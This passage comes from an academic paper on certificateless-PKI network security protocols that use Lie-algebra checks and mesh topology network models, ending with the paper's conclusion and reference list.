(Vijayarangan and Vijayasarathy 2005, Vijayarangan 2009), the inverse operations of MP -1 { MP(RC1)}<br />

and MP -1 { MP(RC2)} are performed through a primitive polynomial of LFSR, T -1 -function and deshuffling<br />

and their values RC1 and RC2 must be distinct.<br />

In NSP 3, the server will not satisfy Jacobi identity if an attacker changes RC. The rationale behind on<br />

using Jacobi identity is that a Lie product computed on RC from client end must match with the server.<br />

Then the server checks Jacobi identity and ensures that the same client has sent the Lie product. If<br />

the attacker alters a Lie product, then the server could detect this fraud by verifying Jaboci identity. It<br />

is important to know that Abelian Lie algebras (for every x and y , [x,y] = 0 ) should not be considered.<br />

From the above protocols, we can make out a proposition that dishonest clients can be eliminated in a<br />

Mesh Topology Network (MTN) based on NSP 1,2 and 3. Thus, a system of protocols 1,2,3 can be<br />

plugged into an MTN which brings out a strong and secure network.<br />

322


Natarajan Vijayarangan<br />

The proposed Mesh Topology Network (MTN) is a network where all the protocols (NSP 1, 2 and 3)<br />

are connected to each other and is an integrated network – illustrated in Figure 1. In the topology<br />

network, every protocol is connected to other protocols on the network through hops and each<br />

protocol itself acts as a node (mote). Some are connected through single-hop networks and some<br />

may be connected with more than one hop. It has been designed that the entire mesh network is<br />

continuously connected. Even if one node fails in the mesh network, the network finds an alternate<br />

route to transfer the data.<br />

Network security protocol 1<br />

A group of network<br />

security protocols based<br />

on certificateless PKI<br />

Network security protocol 2<br />

MTN<br />

Network security protocol 3<br />

Figure 1: A cluster of network security protocols supporting MTN<br />

Normally, attackers can break a network using RF direction finding, traffic rate analysis and timecorrelation<br />

monitoring. Whereas, in the proposed MTN, one may not find easily roles played by nodes,<br />

the existence and location of nodes and the current location of specific functions (MP or Lie). Further,<br />

the MTN has been classified into different models (Star, Ring and Hybrid) for serving different<br />

applications. Star-MTN is a collection of communication protocols connected to a central hub which<br />

distributes NSP 1,2 and 3 to nodes. All communication lines traverse to the central hub. The<br />

advantage of this topology is the simplicity of adding additional nodes. This method has applications<br />

in VSAT terminals. In local area network / wide area network where Ring-MTN could be used, each<br />

system is connected to the network in a closed loop or ring. Basically, all systems in the ring are<br />

connected to each other by NSP={NSP 1, MP & Lie functions}. It has the ability to switch over from<br />

NSP 1 into NSP 2 or 3. Hybrid-MTN is proportional to the exponent of the number of nodes. If there<br />

are 'n' nodes in a hybrid communication, it will require n(n-1)/2 network paths to make a full mesh<br />

network. In this model, NSP 1 can be converted to NSP 2 or NSP 3 by exchanging MP or Lie<br />

functions between nodes. This model is widely applicable to telecommunication paths like mobile<br />

roaming and International SMS.<br />

NSP<br />

1<br />

NSP<br />

2<br />

NSP<br />

2<br />

Network<br />

Security<br />

Protocols 1,2,3<br />

NSP 3<br />

NSP<br />

NSP<br />

3<br />

NSP<br />

NSP<br />

NSP<br />

NSP 1<br />

NSP 2<br />

NSP 3<br />

NSP 3<br />

Figure 2: Star-MTN Figure 3: Ring-MTN Figure 4: Hybrid-MTN<br />

323<br />

NSP 2<br />

NSP 1


8. Conclusion<br />

Natarajan Vijayarangan<br />

The network security protocols produced by the system and method in accordance with this invention<br />

described above finds a number of applications in Information Security and Communication channels.<br />

Particularly, they are directly applied in remote sensing, keyless entry, access control and defense<br />

systems. Since these protocols are secure and less computational complexity (compared with<br />

certificate based PKC), they can be together used in MTN to improve the efficiency. In terms of<br />

memory and space, Protocols 1,2 and 3 with ECC-256 bits are suitable for tiny devices. Hence we<br />

conclude that the proposed protocols could be used for multiple applications.<br />

References<br />

Adi Shamir (1984) “Identity-Based Cryptosystems and Signature Schemes”, Advances in Cryptology:<br />

Proceedings of CRYPTO 84, Lecture Notes in Computer Science, vol 7, pp 47-53.<br />

Al-Riyami, S.S. and Paterson, K.G. (2003), “Certificateless Public Key Cryptography”, Advances in Cryptology -<br />

Proceedings of ASIACRYPT -2003.<br />

Bellare, M. and Rogaway, P. (1993) “Random oracles are practical: A paradigm for designing efficient protocols”,<br />

In ACM CCS 93: 1st <strong>Conference</strong> on Computer and Communications Security, pp 62–73, USA.<br />

Bellovin, S.M. and Merritt, M. (1992) “ Encrypted key exchange: Password-based protocols secure against<br />

dictionary attacks”, IEEE Symposium on Security and Privacy, pp 72–84, Oakland, California, USA.<br />

Certicom Research (2000), Standards for efficient cryptography, SEC 1: Elliptic Curve Cryptography, Ver. 1.0,<br />

[Online], Available: http://www.secg.org/download/aid-385/sec1_final.pdf<br />

Diffie, W. and Hellman, M.E. (1976) “New directions in cryptography”, IEEE Transactions on Information Theory,<br />

22(6):644–654.<br />

Hankerson, D., Menezes, A. and Vanstone, S.A. (2004), Guide to Elliptic Curve Cryptography, Springer-Verlag.<br />

Jacobson, Nathan (1979), Lie algebras, Dover Publications, Inc., New York.<br />

MacKenzie, P.D. (2002) The PAK suite: Protocols for password-authenticated key exchange, Contributions to<br />

IEEE P1363.2.<br />

Needham, R.M. and Schroeder, M.D. (1978) “Using encryption for authentication in large networks of<br />

computers”, Communications of the Association for Computing Machinery, 21(21):993– 999.<br />

Vijayarangan, Natarajan (2009) “Design and analysis of Message Pre processing functions for reducing Hash<br />

collisions”, Proceedings of ISSSIS, Coimbatore, India.<br />

Vijayarangan, Natarajan (2009), “Method for preventing and detecting hash collisions of data during the data<br />

transmission”, USPTO Patent Pre-grant No. 20090085780.<br />

Vijayarangan, N. and Kasilingam, S. (2004), “Random number generation using primitive polynomials”,<br />

Proceedings of SSCCII, Italy.<br />

Vijayarangan, N. and Vijayasarathy, R. (2005), “Primitive polynomials testing methodology”, Jour. of Discrete<br />

Mathematical Sciences and Cryptography, vol 8(3), pp 427-435.<br />

324

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!